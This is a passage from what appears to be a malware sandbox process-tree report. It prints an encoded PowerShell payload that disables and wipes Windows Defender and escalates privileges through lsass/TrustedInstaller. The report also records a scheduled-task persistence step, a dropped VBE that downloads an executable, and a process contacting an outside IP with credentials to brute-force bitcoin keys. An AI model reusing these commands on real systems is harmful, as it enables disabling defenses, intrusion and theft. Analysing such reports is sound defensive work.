UAcgB2AGkAYwBlACcAIAAtAHcAaQBuACAAMQANAAoAZABlAGwAIAAoACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKwAnAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAUwBjAGEAbgBzAFwAbQBwAGUAbgBnAGkAbgBlAGQAYgAuAGQAYgAnACkAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAAgACAAIAAgACAAIAAgACAAIAAgACAAIwAjACAAQwBvAG0AbQBlAG4AdABlAGQAIAA9ACAAawBlAGUAcAAgAHMAYwBhAG4AIABoAGkAcwB0AG8AcgB5AA0ACgBkAGUAbAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABTAGMAYQBuAHMAXABIAGkAcwB0AG8AcgB5AFwAUwBlAHIAdgBpAGMAZQAnACkAIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAJwBAACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAAOwAgAGkAZQB4ACgAKABnAHAAIABSAGUAZwBpAHMAdAByAHkAOgA6AEgASwBFAFkAXwBVAHMAZQByAHMAXABTAC0AMQAtADUALQAyADEAKgBcAFYAbwBsAGEAdABpAGwAZQAqACAAVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACAALQBlAGEAIAAwACkAWwAwAF0ALgBUAG8AZwBnAGwAZQBEAGUAZgBlAG4AZABlAHIAKQANAAoAIwAtAF8ALQAjAA==10⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:4824 -
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" qc windefend11⤵
- Launches sc.exe
PID:8868
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"11⤵PID:8976
-
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /groups11⤵PID:9268
-
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" start TrustedInstaller11⤵PID:9548
-
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" start lsass11⤵PID:10228
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmAHIAbwBtACAAVQBBAEMAIABlAHgAcABsAG8AaQB0AHMAJwArACQAcgArACcAIAAgACAAIABgAGAAYAAnACsAJAByACsAWwBjAGgAYQByAF0AMwA5AA0ACgAkAHMAYwByAGkAcAB0AD0AJwAtAG4AbwBwACAALQB3AGkAbgAgADEAIAAtAGMAIAAmACAAewByAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAA7ACQAQQB2AGUAWQBvAD0AJwArACQAbgBmAG8AKwAnADsAJABlAG4AdgA6ADEAPQAnACsAJABlAG4AdgA6ADEAOwAgACQAZQBuAHYAOgBfAF8AQwBPAE0AUABBAFQAXwBMAEEAWQBFAFIAPQAnAEkAbgBzAHQAYQBsAGwAZQByACcADQAKACQAcwBjAHIAaQBwAHQAKwA9ACcAOwBpAGUAeAAoACgAZwBwACAAUgBlAGcAaQBzAHQAcgB5ADoAOgBIAEsARQBZAF8AVQBzAGUAcgBzAFwAUwAtADEALQA1AC0AMgAxACoAXABWAG8AbABhAHQAaQBsAGUAKgAgAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAgAC0AZQBhACAAMAApAFsAMABdAC4AVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACkAfQAnADsAIAAkAGMAbQBkAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsACAAJwArACQAcwBjAHIAaQBwAHQADQAKAA0ACgBpAGYAIAAoACQAdQAgAC0AZQBxACAAMAApACAAewANAAoAIAAgAHMAdABhAHIAdAAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGEAcgBnAHMAIAAkAHMAYwByAGkAcAB0ACAALQB2AGUAcgBiACAAcgB1AG4AYQBzACAALQB3AGkAbgAgADEAOwAgAGIAcgBlAGEAawANAAoAfQANAAoAaQBmACAAKAAkAHUAIAAtAGUAcQAgADEAKQAgAHsADQAKACAAIABpAGYAIAAoACQAZgBsAGEAdwAuAEEAYwB0AGkAbwBuAHMALgBJAHQAZQBtACgAMQApAC4AUABhAHQAaAAgAC0AaQBuAG8AdABsAGkAawBlACAAJwAqAHcAaQBuAGQAaQByACoAJwApAHsAcwB0AGEAcgB0ACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AYQByAGcAcwAgACQAcwBjAHIAaQBwAHQAIAAtAHYAZQByAGIAIAByAHUAbgBhAHMAIAAtAHcAaQBuACAAMQA7ACAAYgByAGUAYQBrAH0ADQAKACAAIABzAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgACQAKAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAnACsAJABzAGMAcgBpAHAAdAArACcAIAAjACcAKQANAAoAIAAgACQAegA9ACQAYgBwAGEAcwBzAC4AUgB1AG4ARQB4ACgAJABuAHUAbABsACwAMgAsADAALAAkAG4AdQBsAGwAKQA7ACAAJAB3AGEAaQB0AD0AMAA7ACAAdwBoAGkAbABlACgAJABiAHAAYQBzAHMALgBTAHQAYQB0AGUAIAAtAGcAdAAgADMAIAAtAGEAbgBkACAAJAB3AGEAaQB0ACAALQBsAHQAIAAxADcAKQB7AHMAbABlAGUAcAAgAC0AbQAgADEAMAAwADsAIAAkAHcAYQBpAHQAKwA9ADAALgAxAH0ADQAKACAAIABpAGYAKABnAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAApAHsAcgBwACAAaABrAGMAdQA6AFwAZQBuAHYAaQByAG8AbgBtAGUAbgB0ACAAdwBpAG4AZABpAHIAIAAtAGUAYQAgADAAOwBzAHQAYQByAHQAIABwAG8AdwBlAHIAcwBoAGUAbABsACAALQBhAHIAZwBzACAAJABzAGMAcgBpAHAAdAAgAC0AdgBlAHIAYgAgAHIAdQBuAGEAcwAgAC0AdwBpAG4AIAAxAH0AOwBiAHIAZQBhAGsADQAKAH0ADQAKAGkAZgAgACgAJAB1ACAALQBlAHEAIAAyACkAIAB7AA0ACgAgACAAJABBAD0AWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMAQQBzAHMAZQBtAGIAbAB5ACIAKAAxACwAMQApAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMATQBvAGQAdQBsAGUAIgAoADEAKQA7ACQARAA9AEAAKAApADsAMAAuAC4ANQB8ACUAewAkAEQAKwA9ACQAQQAuACIARABlAGYAYABpAG4AZQBUAHkAcABlACIAKAAnAEEAJwArACQAXwAsAA0ACgAgACAAMQAxADcAOQA5ADEAMwAsAFsAVgBhAGwAdQBlAFQAeQBwAGUAXQApAH0AIAA7ADQALAA1AHwAJQB7ACQARAArAD0AJABEAFsAJABfAF0ALgAiAE0AYQBrAGAAZQBCAHkAUgBlAGYAVAB5AHAAZQAiACgAKQB9ACAAOwAkAEkAPQBbAEkAbgB0ADMAMgBdADsAJABKAD0AIgBJAG4AdABgAFAAdAByACIAOwAkAFAAPQAkAEkALgBtAG8AZAB1AGwAZQAuAEcAZQB0AFQAeQBwAGUAKAAiAFMAeQBzAHQAZQBtAC4AJABKACIAKQA7ACAAJABGAD0AQAAoADAAKQANAAoAIAAgACQARgArAD0AKAAkAFAALAAkAEkALAAkAFAAKQAsACgAJABJACwAJABJACwAJABJACwAJABJACwAJABQACwAJABEAFsAMQBdACkALAAoACQASQAsACQAUAAsACQAUAAsACQAUAAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsAFsASQBuAHQAMQA2AF0ALABbAEkAbgB0ADEANgBdACwAJABQACwAJABQACwAJABQACwAJABQACkALAAoACQARABbADMAXQAsACQAUAApACwAKAAkAFAALAAkAFAALAAkAEkALAAkAEkAKQANAAoAIAAgACQAUwA9AFsAUwB0AHIAaQBuAGcAXQA7ACAAJAA5AD0AJABEAFsAMABdAC4AIgBEAGUAZgBgAGkAbgBlAFAASQBuAHYAbwBrAGUATQBlAHQAaABvAGQAIgAoACcAQwByAGUAYQB0AGUAUAByAG8AYwBlAHMAcwAnACwAIgBrAGUAcgBuAGUAbABgADMAMgAiACwAOAAyADEANAAsADEALAAkAEkALABAACgAJABTACwAJABTACwAJABJACwAJABJACwAJABJACwAJABJACwAJABJACwAJABTACwAJABEAFsANgBdACwAJABEAFsANwBdACkALAAxACwANAApAA0ACgAgACAAMQAuAC4ANQB8ACUAewAkAGsAPQAkAF8AOwAkAG4APQAxADsAJABGAFsAJABfAF0AfAAlAHsAJAA5AD0AJABEAFsAJABrAF0ALgAiAEQAZQBmAGAAaQBuAGUARgBpAGUAbABkACIAKAAnAGYAJwArACQAbgArACsALAAkAF8ALAA2ACkAfQB9ADsAJABUAD0AQAAoACkAOwAwAC4ALgA1AHwAJQB7ACQAVAArAD0AJABEAFsAJABfAF0ALgAiAEMAcgBgAGUAYQB0AGUAVAB5AHAAZQAiACgAKQA7ACQAWgA9AFsAdQBpAG4AdABwAHQAcgBdADoAOgBzAGkAegBlAA0ACgAgACAAbgB2ACAAKAAnAFQAJwArACQAXwApACgAWwBBAGMAdABpAHYAYQB0AG8AcgBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKAAkAFQAWwAkAF8AXQApACkAfQA7ACAAJABIAD0AJABJAC4AbQBvAGQAdQBsAGUALgBHAGUAdABUAHkAcABlACgAIgBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAGAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAYABzAGgAYQBsACIAKQA7AA0ACgAgACAAJABXAFAAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAVwByAGkAdABlACQASgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABKACwAJABKACkAKQA7ACAAJABIAEcAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAQQBsAGwAbwBjAEgAYABHAGwAbwBiAGEAbAAiACwAWwB0AHkAcABlAFsAXQBdACcAaQBuAHQAMwAyACcAKQA7ACAAJAB2AD0AJABIAEcALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAWgApAA0ACgAgACAAJwBUAHIAdQBzAHQAZQBkAEkAbgBzAHQAYQBsAGwAZQByACcALAAnAGwAcwBhAHMAcwAnAHwAJQB7AGkAZgAoACEAJABwAG4AKQB7AG4AZQB0ADEAIABzAHQAYQByAHQAIAAkAF8AIAAyAD4AJgAxACAAPgAkAG4AdQBsAGwAOwAkAHAAbgA9AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABQAHIAbwBjAGUAcwBzAGUAcwBCAHkATgBhAG0AZQAoACQAXwApAFsAMABdADsAfQB9AA0ACgAgACAAJABXAFAALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsAEAAKAAkAHYALAAkAHAAbgAuAEgAYQBuAGQAbABlACkAKQA7ACAAJABTAFoAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAUwBpAHoAZQBPAGYAIgAsAFsAdAB5AHAAZQBbAF0AXQAnAHQAeQBwAGUAJwApADsAIAAkAFQAMQAuAGYAMQA9ADEAMwAxADAANwAyADsAIAAkAFQAMQAuAGYAMgA9ACQAWgA7ACAAJABUADEALgBmADMAPQAkAHYAOwAgACQAVAAyAC4AZgAxAD0AMQANAAoAIAAgACQAVAAyAC4AZgAyAD0AMQA7ACQAVAAyAC4AZgAzAD0AMQA7ACQAVAAyAC4AZgA0AD0AMQA7ACQAVAAyAC4AZgA2AD0AJABUADEAOwAkAFQAMwAuAGYAMQA9ACQAUwBaAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFQAWwA0AF0AKQA7ACQAVAA0AC4AZgAxAD0AJABUADMAOwAkAFQANAAuAGYAMgA9ACQASABHAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFMAWgAuAGkAbgB2AG8AawBlACgAJABuAHUAbABsACwAJABUAFsAMgBdACkAKQANAAoAIAAgACQASAAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAIgBTAHQAcgB1AGMAdAB1AHIAZQBUAG8AYABQAHQAcgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABEAFsAMgBdACwAJABKACwAJwBiAG8AbwBsAGUAYQBuACcAKQApAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALABAACgAKAAkAFQAMgAtAGEAcwAgACQARABbADIAXQApACwAJABUADQALgBmADIALAAkAGYAYQBsAHMAZQApACkAOwAkAHcAaQBuAGQAbwB3AD0AMAB4ADAARQAwADgAMAA2ADAAMAANAAoAIAAgACQAOQA9ACQAVABbADAAXQAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAJwBDAHIAZQBhAHQAZQBQAHIAbwBjAGUAcwBzACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAQAAoACQAbgB1AGwAbAAsACQAYwBtAGQALAAwACwAMAAsADAALAAkAHcAaQBuAGQAbwB3ACwAMAAsACQAbgB1AGwAbAAsACgAJABUADQALQBhAHMAIAAkAEQAWwA0AF0AKQAsACgAJABUADUALQBhAHMAIAAkAEQAWwA1AF0AKQApACkAOwAgAGIAcgBlAGEAawANAAoAfQANAAoADQAKACQAdwBkAHAAPQAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgAnAA0ACgAnACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcALAAnAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACwAJwBcAE0AcABFAG4AZwBpAG4AZQAnACwAJwBcAFMAcAB5AG4AZQB0ACcALAAnAFwAUgBlAGEAbAAtAFQAaQBtAGUAIABQAHIAbwB0AGUAYwB0AGkAbwBuACcAIAB8ACUAIAB7AG4AaQAgACgAJAB3AGQAcAArACQAXwApAC0AZQBhACAAMAB8AG8AdQB0AC0AbgB1AGwAbAB9AA0ACgANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAJwAgAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACAATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AXwBTAHUAcABwAHIAZQBzAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcAIABEAGkAcwBhAGIAbABlAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAgAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAF8AUwB1AHAAcAByAGUAcwBzACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtACcAIABFAG4AYQBiAGwAZQBTAG0AYQByAHQAUwBjAHIAZQBlAG4AIAAwACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACcAIABEAGkAcwBhAGIAbABlAEEAbgB0AGkAUwBwAHkAdwBhAHIAZQAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAJwAgAEQAaQBzAGEAYgBsAGUAQQBuAHQAaQBTAHAAeQB3AGEAcgBlACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBuAGUAdAAxACAAcwB0AG8AcAAgAHcAaQBuAGQAZQBmAGUAbgBkAA0ACgBzAGMALgBlAHgAZQAgAGMAbwBuAGYAaQBnACAAdwBpAG4AZABlAGYAZQBuAGQAIABkAGUAcABlAG4AZAA9ACAAUgBwAGMAUwBzAC0AVABPAEcARwBMAEUADQAKAGsAaQBsAGwAIAAtAE4AYQBtAGUAIABNAHAAQwBtAGQAUgB1AG4AIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwB0AGEAcgB0ACAAKAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKwAnAFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAE0AcABDAG0AZABSAHUAbgAuAGUAeABlACcAKQAgAC0AQQByAGcAIAAnAC0ARABpAHMAYQBiAGwAZQBTAGUAcgB2AGkAYwBlACcAIAAtAHcAaQBuACAAMQANAAoAZABlAGwAIAAoACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKwAnAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAUwBjAGEAbgBzAFwAbQBwAGUAbgBnAGkAbgBlAGQAYgAuAGQAYgAnACkAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAAgACAAIAAgACAAIAAgACAAIAAgACAAIwAjACAAQwBvAG0AbQBlAG4AdABlAGQAIAA9ACAAawBlAGUAcAAgAHMAYwBhAG4AIABoAGkAcwB0AG8AcgB5AA0ACgBkAGUAbAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABTAGMAYQBuAHMAXABIAGkAcwB0AG8AcgB5AFwAUwBlAHIAdgBpAGMAZQAnACkAIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAJwBAACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAAOwAgAGkAZQB4ACgAKABnAHAAIABSAGUAZwBpAHMAdAByAHkAOgA6AEgASwBFAFkAXwBVAHMAZQByAHMAXABTAC0AMQAtADUALQAyADEAKgBcAFYAbwBsAGEAdABpAGwAZQAqACAAVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACAALQBlAGEAIAAwACkAWwAwAF0ALgBUAG8AZwBnAGwAZQBEAGUAZgBlAG4AZABlAHIAKQANAAoAIwAtAF8ALQAjAA==10⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:8176 -
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" qc windefend11⤵
- Launches sc.exe
PID:8844
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"11⤵PID:8992
-
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /groups11⤵PID:9320
-
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" start TrustedInstaller11⤵PID:9400
-
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" start lsass11⤵PID:9720
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10206730101\st22BJg.exe"C:\Users\Admin\AppData\Local\Temp\10206730101\st22BJg.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
PID:12452 -
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\pack82.vbe"8⤵
- Blocklisted process makes network request
- Downloads MZ/PE file
- Checks computer location settings
PID:12600 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /ru system /tn Microsoft\Windows\Shell\WindowsObjectChecking /sc onstart /tr "C:\Users\Admin\AppData\Roaming\B8AD0ED6F593F823EEB273FFBD548993\406B95324F84EF027D0E7A51C567FEAC.vbe" /f /rl highest9⤵
- Scheduled Task/Job: Scheduled Task
PID:6108
-
-
C:\Users\Admin\AppData\Local\Temp\System.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\Security Protection Windows.pif"C:\Users\Admin\AppData\Local\Temp\System.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\Security Protection Windows.pif" 95.168.166.227:8082:admin:12r3sa6qf99⤵
- Executes dropped EXE
PID:6392 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c OpenCL.pif -c --continue save.txt --keyspace 00000000000000000000000000000000000000000000001CDAB06A52CB4C4000:00000000000000000000000000000000000000000000001CDAB06DF61DE07FFF -b 0 -t 0 -p 0 19vkiEajfhuZ8bs8Zu2jgmC6oqZbWqhxhG 2>&1 | powershell -Command "$input | Select-Object -Last 9 | Add-Content keyc.txt"10⤵PID:6244
-
C:\Users\Admin\AppData\Local\Temp\OpenCL.pifOpenCL.pif -c --continue save.txt --keyspace 00000000000000000000000000000000000000000000001CDAB06A52CB4C4000:00000000000000000000000000000000000000000000001CDAB06DF61DE07FFF -b 0 -t 0 -p 0 19vkiEajfhuZ8bs8Zu2jgmC6oqZbWqhxhG11⤵
